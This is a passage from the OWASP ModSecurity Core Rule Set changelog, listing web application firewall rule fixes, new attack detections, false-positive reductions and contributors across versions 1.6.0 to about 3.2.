Schwindt) * Fix failing regression tests (Ervin Hegedus) * Fix failing tests (Manuel Spartan, Chaim Sanders) * Fix readme typos in example rule (Walter Hop) * Fix test 941110-2 (Federico G. Schwindt) * Fix YAML 1.2 compliance with "true" (Federico G. Schwindt) * RCE: Add tests for the for command (Federico G. Schwindt) * Update regression tests for rules 931110, 931120, 931130 (Simon Studer) Documentation: * Add details to README for Dockerhub (Franziska Bühler) * Add intro/comment to CVE comments (Franziska Bühler) * CONTRIBUTING: add note about separate PRs (Walter Hop) * Erased gitter chat. Added CII badge (Felipe Zipitria) * Replaced descriptions (Christian Folini) * Summarized authors on single line in tests for 941160 (Christian Folini) * Update broken link in regexp-assemble blog URLs (Walter Hop) * Update CONTRIBUTING.md To base changes on v3.2/dev. (Felipe Zipitría) * Update CONTRIBUTORS order (Andrea Menin) * Update README.md (Rufus125) * Updating crs site location (Chaim Sanders) ## Version 3.1.1 - 2019-06-26 * Fix CVE-2019-11387 ReDoS against CRS on ModSecurity 3 at PL 2 (Christoph Hansen, Federico G. Schwindt) * Content-Type made case insensitive in 920240, 920400 (Federico G. Schwindt) * Allow % encoding in 920240 (Christoph Hansen) * Fix bug in 920440 (Andrea Menin) * Fix bug in 920470 (Walter Hop) * Reduce false positives in 921110 (Yu Yagihashi, Federico G. Schwindt) * Fix bug in 943120 (XeroChen) ## Version 3.1.0 - 2018-08-07 * Add Detectify scanner (Andrea Menin) * Renaming matched_var/s (Victor Hora) * Remove lines with bare '#' comment char (Walter Hop) * Drop the XML variable from rule 932190 (Federico G. Schwindt) * Update outdated URLs (Walter Hop) * remove unused rule 901180 (Walter Hop) * Drop exit from unix and windows RCE (Federico G. Schwindt) * Fix anomaly_score counters (Federico G. 
Schwindt) * Remove mostly redundant 944220 in favor of 944240 (Christian Folini) * Add self[ and document[ to rule 941180 (Andrea Menin) * Provide proxy support within CRS docker image (Scott O'Neil) * Prevent bypass in rule 930120 PL3 (Andrea Menin) * Fix small typo in variable (Felipe Zipitría) * Fix bug #1166 in Docker image (Franziska Bühler) * Remove revision status from rules (Federico G. Schwindt) * Add template for issues (Federico G. Schwindt) * Correct failing travis tests in merge situations (Federico G. Schwindt) * Remove unused global variable in IIS rules (Chaim Sanders) * Refactor to use phase number instead of name (Federico G. Schwindt) * Add uploaded file name check; refresh LFI / filename checks (Walter Hop) * Introduce critical sibling of 920340 in PL2 (Walter Hop) * Fix bypass caused by multiple spaces in RCE rules (Walter Hop) * Remove unneeded regex capture groups (Federico G. Schwindt) * Add built-in exceptions for CPanel (Christoph Hansen) * Add additional file restrictions for ws_ftp, DS_Store...
(Jose Nazario) * Fix missing strings in 942410 (Franziska Bühler) * Add 2 missing PDO errors (Christoph Hansen) * Fix issues with FPs in regression tests (Chaim Sanders) * Add Nextcloud client exclusion support (Christoph Hansen) * Fix spelling mistakes in REQUEST-942- (Padraig Doran, Chaim Sanders) * Explicitly ignore the user defined rules (Aaron Haaf, Chaim Sanders) * Add regression tests for 942490 (Christoph Hansen, Chaim Sanders) * Add Owncloud client exclusion support (Christoph Hansen, Christian Folini) * Adding 'F-Secure Radar' vulnerability scanner UA (Christian Folini, Chaim Sanders) * Update DockerFile to use Ubuntu as base (Chaim Sanders) * False positives 942360: move alter and union (Franziska Bühler, Chaim Sanders) * Add support for Java style attacks (Manuel Spartan, Walter Hop) * Fix various regression tests issues caused by webserver handling (azhao155, Chaim Sanders) * Update TravisCI to build on a per PR basis (Chaim Sanders) * Optimized rule 921160 and regex (Allan Boll, Chaim Sanders) * Update the consistency across various files (Federico G. Schwindt) * Add missing transform, 944120 sibling 944240 (Manuel Spartan) * Fix false positive for 'like' in 942120 (Walter Hop) * Add regression tests for Java Rules (Manuel Spartan) * Fixup and small reorg of dokuwiki rule exclusion package (Christian Folini) * Make TravisCI tests fail if Apache can't load rules (Felipe Zipitría) * Add exclusion rules for Dokuwiki (Matt Bagley, Christian Folini) * Initial exclusions for NextCloud installs (Matt Bagley, Christian Folini) * Added struts-pwn UA to list (Manuel Spartan) * Uses MULTIPART_MISSING_SEMICOLON instead of MULTIPART_SEMICOLON_MISSING (Felipe Zimmerle) * Add file upload checks (Manuel Spartan) * Check if Transfer-Encoding is missing (Federico G. Schwindt, Christian Folini) * Remove duplicated variables (Federico G. 
Schwindt) * Reduce FP by splitting classic SQL injection rule 942370 (Christoph Hansen) * Fix typo in REQUEST-920-PROTOCOL-ENFORCEMENT (ihacku, Franziska Bühler) * Add configurable timestamp format to FTW integration (Christian Folini) * Add badges to README (Felipe Zipitría) * Add clarifying comments to 910110 (Christian Folini) * Making rule 933131 case-insensitive (Manuel Spartan) * Merge and reorder rules as part of cleanup (Federico G. Schwindt) * Update copyright date and syntax (Jose Nazario, Felipe Zipitría) * Updated SecMarker and SkipAfter names to meet guidelines (Felipe Zipitría) * Tidy up single quotes and other guidelines updates (Felipe Zipitría) * Syntax fix for setvar crs_exclusions_wordpress (Manuel Spartan) * Updated various contributors to developers (Christian Folini) * Revise SQL rules by disassembling them into their core protections (Franziska Bühler) * Add an example payload to 920220 (coolt) * Add a missing regex to rule 942310 (Franziska Bühler) * Detect GET or HEAD with Transfer-Encoding header (Federico G. Schwindt) * Fix broken links in references (Pásztor Gábor) * Add contributing guidelines (Felipe Zipitría) * Fix processing bypasses in rule 931130 (Felipe Zipitría, Christian Folini) * Correct small omissions in unix-shell.data (Walter Hop) * Add IIS specific detection to LFI-os-files.data (Manuel Spartan) * Update examples to match the current cleanup (Federico G. Schwindt) * Corrected the ordering of actions to meet guidelines (Felipe Zipitría) * Remove unused capture groups (Federico G. Schwindt) * Use explicit rx operator (Federico G. Schwindt) * Update the RCE regular expressions (Walter Hop, Federico G.
Schwindt) * Removing maturity & accuracy from rules (Felipe Zipitría) * Increasing range header (Christoph Hansen) * Fixed upgrade.py script argument options (Glyn Mooney) * Updating to reflect OWASP flagship status (Chaim Sanders) * Adding Docker support for CRS (Chaim Sanders) * Initial Travis deployment (Zack Allen, Walter Hop) * Initial commit of regression tests (Chaim Sanders, Walter Hop) * Remove test for 921170 because it won't ever fire (Chaim Sanders, Walter Hop) * Update minor incorrectness in asp.net regex (Chaim Sanders, Walter Hop) * Add notification for builds against #modsecurity on freenode (Zack Allen, Walter Hop) * Add all past code contributors and convert to markdown (Walter Hop) * Block uploads of files with .phps extension (Walter Hop) * Improve message for script upload with superfluous extension (Walter Hop) * Remove trailing whitespace in various regexs (Walter Hop) * Add command popd to direct unix rce list in rule 932150 (Franziska Bühler) * Remove unnecessary END_XSS_CHECKS marker (Christian Folini) * Ignore Whitespaces in Rule 942110 (Christoph Hansen) * Update missing RCE Commands (Umar Farook) * Update lfi-os-files.data (Umar Farook) * Removed deprecated t:removeComments from 942100 (Christian Folini) * Add word boundary to rule 942410 (Franziska Bühler) ## Version 3.0.2 - 2017-05-12 * Remove debug rule that popped up in 3.0.1 (Christian Folini) ## Version 3.0.1 - 2017-05-09 * SECURITY: Removed insecure handling of X-Forwarded-For header; reported by Christoph Hansen (Walter Hop) * Fixed documentation errors in RESPONSE-999-... 
(Chaim Sanders) * Reduced FPs on 942190 by adding a word boundary to regex (Franziska Bühler) * Reduced FPs on 932150 by removing keyword reset (Franziska Bühler) * Tidied exceptions in 930100 (Roberto Paprocki) * Reduced FPs for 920120 by splitting into stricter sibling (Franziska Bühler) * Simplified some Drupal rule exclusions (Damien McKenna, Christian Folini) * Extended KNOWN_BUGS with remarks on JSON support on Debian (Franziska Bühler) * Updated README to add gitter support (Chaim Sanders) * Clarified DoS documentation for static extensions (Roberto Paprocki) * Added application/octet-stream to allowed content types (Christian Folini) * Typo in 942220 alert message (Chaim Sanders, @bossloper) * Moved referrer check of 941100 into new PL2 rule (Franziska Bühler) * Closed multiple @pmf evasions via lowercase transformation (Roberto Paprocki) * Clarified libinjection bundling in INSTALL file (@cjdp) * Reduced FPs via Wordpress Rule Exclusions (Walter Hop) * Support for RFC 3902 (Content Type application/soap+xml; Christoph Hansen) Make sure you update ModSecurity recommended rule 200000 as well. 
* Bugfix in 942410 regex (Christian Folini) * Reduced FPs for 942360 (Walter Hop) * Reduced FPs for 941120 by restricting event handler names (Franziska Bühler) * Extended 931000 with scheme "file" to fix false negative (Federico Schwindt) * Extended 905100 and 905110 for HTTP/2.0 (includes bugfix, Christoph Hansen) * Moved 941150 from PL1 to PL2; includes Bugfix for rule (Christian Folini) * Updated documentation for 920260 (Chaim Sanders) * Bugfix in upgrade.py (Victor Hora) * Fixed FP in RCE rule 932140 (Walter Hop) * Fixed comment for arg limit check rule 920370 (Christian Folini) * Created CONTRIBUTORS file * Added Christoph Hansen (emphazer) to CONTRIBUTORS file * Added Franziska Bühler (Franziska Bühler) to CONTRIBUTORS file * Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini) ## Version 3.0.0 - 2016-11-10 Huge changeset running in separate branch from September 2013 to September 2016. This is a cursory summary of the most important changes: * Huge reduction of false positives (Ryan Barnett, Felipe Zimmerle, Chaim Sanders, Walter Hop, Christian Folini) * Anomaly scoring is the new default, renamed thresholds from tx.(in|out)bound_anomaly_score_level to tx.(in|out)bound_anomaly_score_threshold * Introduction of libinjection for SQLi detection * Introduction of libinjection for XSS detection * Big improvement on detection of Remote Command Execution (Walter Hop) * Big improvement on PHP function name detection (Walter Hop) * Paranoia Mode (Christian Folini, Noël Zindel, Franziska Bühler, Manuel Leos, Walter Hop) * Shifted dozens of rules into higher paranoia levels * Introduced a lot of stricter sibling rules in higher levels * Generic mechanism to support application specific rule exclusions (Chaim Sanders) * Initial Wordpress rule exclusions (Walter Hop) * Initial Drupal rule exclusions (Christian Folini, @emphazer) * Renumbering of rules. 
See folder id_renumbering for a csv map (Chaim Sanders) * Consolidation of rules, namely XSS and SQLi (Spider Labs/Trustwave team) * Sampling mode / Easing in (Christian Folini) * Cleanup of reputation checks / persistent blocking (Christian Folini / Walter Hop) * Tags much more systematic (Walter Hop) * IP reputation checks / persistent blocking of certain clients (Spider Labs/Trustwave team) * Phase actions use request/response/logging now instead of numerical phases (Spider Labs/Trustwave team) * Added NoScript XSS Filters (Spider Labs/Trustwave team) * Updated "severity" action to use words (CRITICAL, WARNING, etc...) vs. numbers (5, 4, etc..) * Various regex fixes after research by Vladimir Ivanov (Chaim Sanders) * Overhaul of the regression mode into debug mode (Walter Hop, Ryan Barnett) * Introduction of util/upgrade.py (Walter Hop) * Removal of GeoIP database. Download via util/upgrade.py now. * Introduction of Initialization rules with default values (Walter Hop, Christian Folini) * Sorting out terminology with whitelisting and rule exclusions (Christian Folini) * Overhaul of testing (Chaim Sanders) * Protection from HTTP Parameter Pollution (Franziska Bühler) * Simplification of setup config file, renamed file to crs-setup.conf.example * Improved session fixation detection logic (Christian Peron, credits to Eric Hodel for the discovery) * Updated list of malicious webscanners * Splitting scanner user agents data files (github user @ygrek) * Countless bugfixes in severities, anomaly scores, tags, etc. 
across the board * Cleanup of formerly experimental DDoS rules, fix documentation (Ryan Barnett, Christian Folini) * Improves http blacklist checks (Walter Hop) * Extended XSS detection (as suggested by Mazin Ahmed) * Added support for Travis CI * Added support for HTTP/2 in recent Apache 2.4 (Walter Hop) * Added many, many bots and scanners (among others suggested by github user @toby78, @jamuse, Matt Koch) * Fixed mime types suitable for XML processor (Chaim Sanders) * Include script in util/join-multiline-rules to work around Apache 2.4 < 2.4.11 bug with long lines (Walter Hop) * New detection for request smuggling attacks (Achim Hofmann, Christian Folini) * Fixes with project honeypot setup (Ryan Barnett) * Separated DB / SQL messages by DB software (Ryan Barnett) * CPanel integration (Chaim Sanders) * Introduction of var for static resources (Chaim Sanders) * Many improvements to rules in 2014/5 (Ryan Barnett) ## Version 2.2.9 - 2013-09-30 Improvements: * Updated the /util directory structure Bug Fixes: * fix 950901 - word boundary added * modsecurity_35_bad_robots.data - gecko/25 blocks Firefox Android ## Version 2.2.8 - 2013-06-30 Improvements: * Updatd the /util directory structure * Added scripts to check Rule ID duplicates * Added script to remove v2.7 actions so older ModSecurity rules will work * * Added new PHP rule (958977) to detect PHP exploits (Plesk 0-day from king cope) * * Bug Fixes: * fix 950901 - word boundary added * * fix regex error * * Updated the Regex in 981244 to include word boundaries * * Problem with Regression Test (Invalid use of backslash) - Rule 960911 - Test2 * * ModSecurity: No action id present within the rule - ignore_static.conf * * "Bad robots" rule blocks all Java applets on Windows XP machines * * duplicated rules id 981173 * ## Version 2.2.7 - 2012-12-19 Improvements: * Added JS Overrides file to identify successful XSS probes * Added new XSS Detection Rules from Ashar Javed () * * Updated the SQLi Filters to add in 
Oracle specific functions * Bug Fixes: * Fixed Session Hijacking rules * * Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable ## Version 2.2.6 - 2012-09-14 Improvements: * Started rule formatting update for better readability * Added maturity and accuracy action data to each rule * Updated rule revision (rev) action * Added rule version (ver) action * Added more regression tests (util/regression_tests/) * Modified Rule ID 960342 to block large file attachments in phase:1 * Removed all PARANOID rule checks * Added new Session Fixation rules Bug Fixes: * Fixed missing ending double-quotes in XSS rules file * Moved SecDefaultAction setting from phase:2 to phase:1 * Fixed Session Hijacking SessionID Regex * Changed the variable listing for many generic attack rules to exclude REQUEST_FILENAME ## Version 2.2.5 - 2012-06-14 Security Fixes: * Updated the anomaly scoring value for rule ID 960000 to critical (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) () * Updated Content-Type check to fix possible evasion with @within (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) () Improvements: * Renamed main config file to modsecurity_crs_10_setup.conf * Updated the rule IDs to start from CRS reserved range: 900000 * Updated rule formatting for readability * Updated the CSRF rules to use UNIQUE_ID as the token source * Added the zap2modsec.pl script to the /util directory which converts OWASP ZAP Scanner XML data into ModSecurity Virtual Patches * Updated the Directory Traversal Signatures to include more obfuscated data * Added Arachni Scanner Integration Lua script/rules files Bug Fixes: * Added forceRequestBodyVariable action to rule ID 960904 ## Version 2.2.4 - 2012-03-14 Improvements: * Added Location and Set-Cookie checks to Response Splitting rule ID 950910 * Added a README file to the activated_rules directory * Consolidate a number of SQL Injection rules into optimized regexs * Removed multiMatch and replaceComments from SQL 
Injection rules * Updated the SQLi regexs for greediness * Updated the SQLi setvar anomaly score values to use macro expansion * Removed PARANOID mode rules Bug Fixes: * Fixed missing comma before severity action in rules 958291, 958230 and 958231 * Fixed duplicate rule IDs ## Version 2.2.3 - 2011-12-19 Improvements: * Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_application_defects.conf file * Added Watcher Charset Checks to optional_rules/modsecurity_crs_55_application_defects.conf file * Added Watcher Header Checks to optional_rules/modsecurity_crs_55_application_defects.conf file Bug Fixes: * Fixed Content-Type evasion issue by adding ctl:forceRequestBodyVariable action to rule ID 960010. (Identified by Andrew Wilson of Trustwave SpiderLabs). * Updated the regex and added tags for RFI rules. ## Version 2.2.2 - 2011-09-28 Improvements: * Updated the AppSensor Profiling (to use Lua scripts) for Request Exceptions Detection Points * Added new Range header detection checks to prevent Apache DoS * Added new Security Scanner User-Agent strings * Added example script to the /util directory to convert Arachni DAST scanner XML data into ModSecurity virtual patching rules.
* Updated the SQLi Character Anomaly Detection Rules * Added Host header info to the RESOURCE collection key for AppSensor profiling rules Bug Fixes: * Fixed action list for XSS rules (replaced pass,nolog,auditlog with block) * Fixed Request Limit rules by removing & from variables * Fixed Session Hijacking IP/UA hash captures * Updated the SQLi regex for rule ID 981242 ## Version 2.2.1 - 2011-07-20 Improvements: * Extensive SQL Injection signature updates as a result of the SQLi Challenge * Updated the SQL Error message detection in response bodies * Updated SQL Injection signatures to include more DB functions * Updated the WEAK SQL Injection signatures * Added tag AppSensor/RE8 to rule ID 960018 Bug Fixes: * Fixed Bad Robot logic for rule ID 990012 to further qualify User-Agent matches * Fixed Session Hijacking rules to properly capture IP address network hashes. * Added the multiMatch action to the SQLi rules * Fixed a false negative logic flaw within the advanced_filter_converter.lua script * Fixed missing : in id action in DoS ruleset. * Updated rule ID 971150 signature to remove ; ## Version 2.2.0 - 2011-05-26 Improvements: * Changed Licensing from GPLv2 to Apache Software License v2 (ASLv2) * Created new INSTALL file outlining quick config setup * Added a new rule regression testing framework to the /util directory * Added new activated_rules directory which will allow users to place symlinks pointing to files they want to run. 
This allows for easier Apache Include wild-carding * Adding in new RULE_MATURITY and RULE_ACCURACY tags * Adding in a check for X-Forwarded-For source IP when creating IP collection * Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset) * Added new AppSensor rules to experimental_dir * Added new Generic Malicious JS checks in outbound content * Added experimental IP Forensic rules to gather Client hostname/whois info * Added support for Mozilla's Content Security Policy (CSP) to the experimental_rules * Global collection in the 10 file now uses the Host Request Header as the collection key. This allows for per-site global collections. * Added new SpiderLabs Research (SLR) rules directory (slr_rules) for known vulnerabilities. This includes both converted web rules from Emerging Threats (ET) and from SLR Team. * Added new SLR rule packs for known application vulns for WordPress, Joomla and phpBB * Added experimental rules for detecting Open Proxy Abuse * Added experimental Passive Vulnerability Scanning ruleset using OSVDB and Lua API * Added additional URI Request Validation rule to the 20 protocol violations file (Rule ID - 981227) * Added new SQLi detection rules (959070, 959071 and 959072) * Added "Toata dragostea mea pentru diavola" to the malicious User-Agent data Bug Fixes: * Assigned IDs to all active SecRules/SecActions * Removed rule inversion (!) from rule ID 960902 * Fixed false negative issue in Response Splitting Rule * Fixed false negative issue with @validateByteRange check * Updated the TARGETS listing for rule ID 950908 * Updated TX data for REQBODY processing * Changed the pass action to block in the RFI rules in the 40 generic file * Updated RFI regex to catch IP address usage in hostname * Changed REQUEST_URI_RAW variable to REQUEST_LINE in SLR rules to allow matches on request methods. * Updated the RFI rules in the 40 generic attacks conf file to remove explicit logging actions. 
They will now inherit the settings from the SecDefaultAction ## Version 2.1.2 - 2011-02-17 Improvements: * Added experimental real-time application profiling ruleset. * Added experimental Lua script for profiling the # of page scripts, iframes, etc.. which will help to identify successful XSS attacks and planting of malware links. * Added new CSRF detection rule which will trigger if a subsequent request comes too quickly (need to use the Ignore Static Content rules). Bug Fixes: * Added missing " in the skipAfter SecAction in the CC Detection rule set ## Version 2.1.1 - 2010-12-30 Bug Fixes: * Updated the 10 config conf file to add in pass action to User-Agent rule * Updated the CSRF ruleset to conditionally do content injection - if the csrf token was created by the session hijacking conf file * Updated the session hijacking conf file to only enforce rules if a SessionID Cookie was submitted * Fixed macro expansion setvar bug in the restricted file extension rule * Moved the comment spam data file into the optional_rules directory ## Version 2.1.0 - 2010-12-29 Improvements: * Added Experimental Lua Converter script to normalize payloads. Based on PHPIDS Converter code and it used with the advanced filters conf file. 
* Changed the name of PHPIDS converted rules to Advanced Filters * Added Ignore Static Content (Performance enhancement) rule set * Added XML Enabler (Web Services) rule set which will parse XML data * Added Authorized Vulnerability Scanning (AVS) Whitelist rule set * Added Denial of Service (DoS) Protection rule set * Added Slow HTTP DoS (Connection Consumption) Protection rule set * Added Brute Force Attack Protection rule set * Added Session Hijacking Detection rule set * Added Username Tracking rule set * Added Authentication Tracking rule set * Added Anti-Virus Scanning of File Attachments rule set * Added AV Scanning program to /util directory * Added Credit Card Usage Tracking/Leakage Prevention rule set * Added experimental CC Track/PAN Leakage Prevention rule set * Added an experimental_rules directory to hold new BETA rules * Moved the local exceptions conf file back into base_rules directory however it has a ".example" extension to prevent overwriting customized versions when upgrading * Separated out HTTP Parameter Pollution and Restricted Character Anomaly Detection rules to the experimental_rules directory * Adding the REQUEST_HEADERS:User-Agent macro data to the initcol in 10 config file, which will help to make collections a bit more unique ## Version 2.0.10 - 2010-11-29 Improvements: * Commented out the Anomaly Scoring Blocking Mode TX variable since, by default, the CRS is running in traditional mode. Bug Fixes: * Moved all skipAfter actions in chained rules to chain starter SecRules * Changed phases on several rules in the 20 protocol anomaly rules file to phase:1 to avoid FNs ## Version 2.0.9 - 2010-11-17 Improvements: * Changed the name of the main config file to modsecurity_crs_10_config.conf.example so that it will not overwrite existing config settings. Users should rename this file to activate it. * Traditional detection mode is now the current default * Users can now more easily toggle between traditional/standard mode vs. 
anomaly scoring mode by editing the modsecurity_crs_10_config.conf file * Updated the disruptive actions in most rules to use "block" action instead of "pass". This is to allow for the toggling between traditional vs. anomaly scoring modes. * Removed logging actions from most rules so that it can be controlled from the SecDefaultAction setting in the modsecurity_crs_10_config.conf file * Updated the anomaly scores in the modsecurity_crs_10_config.conf file to more closely match what is used in the PHPIDS rules. These still have the same factor of severity even though the numbers themselves are smaller. * Updated the 49 and 59 blocking rules to include the matched logdata * Updated the TAG data to further classify attack/vuln categories. * Updated the SQL Injection filters to detect more boolean logic attacks * Moved some files to optional_rules directory (phpids, Emerging Threats rules) Bug Fixes: * Fixed Rule ID 960023 in optional_rules/modsecurity_crs_40_experimental.conf is missing 1 single quote * Moved all skipAfter actions in chained rules to the rule starter line (must have ModSec v2.5.13 or higher) * Fixed restricted file extension bug with macro expansion * Updated the SQLI TX variable macro expansion data in the 49 and 60 files so that it matches what is being set in the sql injection conf file * Fixed typo in SQL Injection regexs - missing backslash for word boundary (b) ## Version 2.0.8 - 2010-08-27 Improvements: * Updated the PHPIDS filters * Updated the SQL Injection filters to detect boolean attacks (1<2, foo == bar, etc..) 
* Updated the SQL Injection filters to account for different quotes * Added UTF-8 encoding validation support to the modsecurity_crs_10_config.conf file * Added Rule ID 950109 to detect multiple URL encodings * Added two experimental rules to detect anomalous use of special characters Bug Fixes: * Fixed Encoding Detection RegEx (950107 and 950108) * Fixed rules-updater.pl script to better handle whitespace * Fixed missing pass action bug in modsecurity_crs_21_protocol_anomalies.conf * Fixed the anomaly scoring in the modsecurity_crs_41_phpids_filters.conf file * Updated XSS rule id 958001 to improve the .cookie regex to reduce false positives ## Version 2.0.7 - 2010-06-04 Improvements: * Added CSRF Protection Ruleset which will use Content Injection to add javascript to specific outbound data and then validate the csrf token on subsequent requests. * Added new Application Defect Ruleset which will identify/fix missing HTTPOnly cookie flags * Added Experimental XSS/Missing Output Escaping Ruleset which looks for user supplied data being echoed back to user unchanged. * Added rules-updater.pl script and configuration file to allow users to automatically download CRS rules from the CRS rules repository. * Added new SQLi keyword for ciel() and reverse() functions. * Updated the PHPIDS filters Bug Fixes: * Fixed false positives for Request Header Name matching in the 30 file by adding boundary characters. * Added missing pass actions to @pmFromFile prequalifier rules * Added backslash to SQLi regex * Fixed hard coded anomaly score in PHPIDS filter file * Fixed restricted_extension false positive by adding boundary characters ## Version 2.0.6 - 2010-02-26 Bug Fixes: * Added missing transformation functions to SQLi rules. * Fixed duplicate rule IDs. 
* Fixed typo in @pmFromFile in the Comment SPAM rules * Added macro expansion to Restricted Headers rule * Fixed misspelled SecMarker * Fixed missing chain action in Content-Type header check * Update phpids filters to use pass action instead of block ## Version 2.0.5 - 2010-02-01 Improvements: * Removed previous 10 config files as they may conflict with local customized Mod configs. * Added a new 10 config file that allows the user to globally set TX variables to turn on/off PARANOID_MODE inspection, set anomaly score levels and http policies. Must have ModSecurity 2.5.12 to use the macro expansion in numeric operators. * Added Rule Logic and Reference links to rules descriptions. * Added Rule IDs to all rules. * Added tag data mapping to new OWASP Top 10 and AppSensor Projects, WASC Threat Classification * Removed Apache limit directives from the 23 file * Added macro expansion to 23 file checks. * Added @pmFromFile check to 35 bad robots file * Added malicious UA strings to 35 bad robots check * Created an experimental rules file * Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection * Removed TX inspections for generic attacks and reverted to standard ARGS inspection * Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA) * Moved converted ET Snort rules to the /optional_rules directory * Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the request headers. * Updated Inbound blocking conf file to use macro expansion from the 10 config file settings * Added separate anomaly scores for inbound, outbound and total to be evaluated for blocking. * Updated the regex logic in the (1=1) rule to factor in quotes and other logical operators. * Updated the SPAMMER RBL check rules logic to only check once per IP/Day. 
* Added new outbound malware link detection rules. * Added PHP "call_user_func" to blacklist Identified by SOGETI ESEC R&D Bug Fixes: * Removed Non-numeric Rule IDs * Updated the variable list on SQLi rules. * Fixed outbound @pmFromFile action from allow to skipAfter to allow for outbound anomaly scoring and blocking ## Version 2.0.4 - 2009-11-30 Improvements: * Updated converted PHPIDS signatures () * Updated PHPIDS rules logic to first search for payloads in ARGS and then if there is no match found then search more generically in request_body|request_uri_raw * Updated PHPIDS rules logic to only set TX variables and to not log. This allows for more clean exceptions in the 48 file which can then expire/delete false positive TX matches and adjust the anomaly scores. These rules will then inspect for any TX variables in phase:5 and create appropriate alerts for any variable matches that exist. Bug Fixes: * Added Anomaly Score check to the 60 correlation file to recheck the anomaly score at the end of phase:4 which would allow for blocking based on information leakage issues. ## Version 2.0.3 - 2009-11-05 Improvements: * Updated converted PHPIDS signatures () * Create a new PHPIDS Converter rules file () * Added new rules to identify multipart/form-data bypass attempts * Increased anomaly scoring (+100) for REQBODY_PROCESSOR_ERROR alerts Bug Fixes: * Added t:urlDecodeUni transformation function to phpids rules to fix both false positives/negatives * Added new variable locations to the phpids filters * Use of transformation functions can cause false negatives - added multiMatch action to phpids rules * Fixed multipart parsing evasion issues by adding strict parsing rules * Fixed typo in xss rules (missing |) * Fixed regex text in IE8 XSS filters (changed to lowercase) ## Version 2.0.2 - 2009-09-11 Improvements: * Added converted PHPIDS signatures () Bug Fixes: * Rule 958297 - Fixed Comment SPAM UA false positive that triggered only on mozilla. 
## Version 2.0.1 - 2009-08-07 Improvements: * Updated the transformation functions used in the XSS/SQLi rules to improve performance * Updated the variable/target list in the XSS rules * Added XSS Filters from IE8 Bug Fixes: * Rule 958297 - Fixed unescaped double-quote issue in Comment SPAM UA rule. ## Version 2.0.0 - 2009-07-29 New Rules & Features: * Fine Grained Policy The rules have been split to have one signature per rule instead of having all signatures combined into one optimized regular expression. This should allow you to modify/disable events based on specific patterns instead of having to deal with the whole rule. * Converted Snort Rules Emerging Threat web attack rules have been converted. * Anomaly Scoring Mode Option The rules have been updated to include anomaly scoring variables which allow you to evaluate the score at the end of phase:2 and phase:5 and decide on what logging and disruptive actions to take based on the score. * Correlated Events There are rules in phase:5 that will provide some correlation between inbound events and outbound events and will provide a result of successful attack or attempted attack. * Updated Severity Ratings The severity ratings in the rules have been updated to the following: * 0: Emergency - is generated from correlation where there is an inbound attack and an outbound leakage. * 1: Alert - is generated from correlation where there is an inbound attack and an outbound application level error. * 2: Critical - is the highest severity level possible without correlation. It is normally generated by the web attack rules (40 level files). * 3: Error - is generated mostly from outbound leakage rules (50 level files). * 4: Warning - is generated by malicious client rules (35 level files). * 5: Notice - is generated by the Protocol policy and anomaly files. * 6: Info - is generated by the search engine clients (55 marketing file).
* Updated Comment SPAM Protections Updated rules to include RBL lookups and client fingerprinting concepts from Bad Behavior () * Creation of Global Collection Automatically create a Global collection in the _10_ config file. Other rules can then access it. * Use of Block Action Updated the rules to use the "block" action. This allows the Admin to globally set the desired block action once with SecDefaultAction in the _10_ config file rather than having to edit the disruptive actions in all of the rules or for the need to have multiple versions of the rules (blocking vs. non-blocking). * "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name." * Added new generic RFI detection rules. * "Possibly malicious iframe tag in output" (Rules 981001,981002) Planting invisible iframes in a site can be used by attackers to point users from the victim site to their malicious site. This is actually as if the user was visiting the attacker's site himself, causing the user's browser to process the content in the attacker's site. New Events: * Rule 960019 - Expect Header Not Allowed. * Rule 960020 - Pragma Header Requires Cache-Control Header * Rule 958290 - Invalid Character in Request - Browsers should not send the (#) character as it is reserved for use as a fragment identifier within the html page. * Rule 958291 - Range: field exists and begins with 0. * Rule 958292 - Invalid Request Header Found. * Rule 958293 - Lowercase Via Request Header Found. * Rule 958294 - Common SPAM Proxies found in Via Request Header. * Rule 958295 - Multiple/Conflicting Connection Header Data Found. * Rule 958296 - Request Indicates a SPAM client accessed the Site. * Rule 958297 - Common SPAM/Email Harvester crawler. * Rule 958298 - Common SPAM/Email Harvester crawler Bug Fixes: * Rule 950107 - Split the rule into 2 separate rules to factor in the Content-Type when inspecting the REQUEST_BODY variable. * Rule 960017 - Bug fix for when having port in the host header. 
* Rule 960014 - Bug fix to correlate the SERVER_NAME variable. * Rule 950801 - Increased the logic so that the rule will only run if the web site uses UTF-8 Encoding. * Rules 999210,999211 - Bug fix to move ctl actions to last rule, add OPTIONS and allow the IPv6 loopback address * Rule 950117 - Updated the RFI logic to factor in both a trailing "?" in the ARG and to identify offsite hosts by comparing the ARG URI to the Host header. Due to this rule now being stronger, moved it from optional tight security rule to _40_ generic attacks file. Other Fixes: * Added more HTTP Protocol violations to _20_ file. * Set the SecDefaultAction in the _10_ config file to log/pass (This was the default setting, however this sets it explicitly). * Added SecResponseBodyLimitAction ProcessPartial to the _10_ config file. This was added so that when running the SecRuleEngine in DetectionOnly mode, it will not deny response bodies that go over the size restrictions. * Changed SecServerSignature to "Apache/1.3.28" * Fixed the use of SkipAfter and SecMarkers to make it consistent. Now have BEGIN and END SecMarkers for rule groups to more accurately allow moving to proper locations. * Fixed the @pm/@pmFromFile pre-qualifier logic to allow for operator inversion. This removes the need for some SecAction/SkipAfter rules. * Updated rule formatting to easily show rule containers (SecMarkers, pre-qualifier rules and chained rules). ## Version 1.6.1 - 2008-04-22 * Fixed a bug where phases and transformations were not specified explicitly in rules. The issue affected a significant number of rules, and we strongly recommend upgrading. ## Version 1.6.0 - 2008-02-19 New Rulesets & Features: * 42 - Tight Security This ruleset currently contains 2 rules which are considered highly prone to FPs. They take care of Path Traversal attacks, and RFI attacks. 
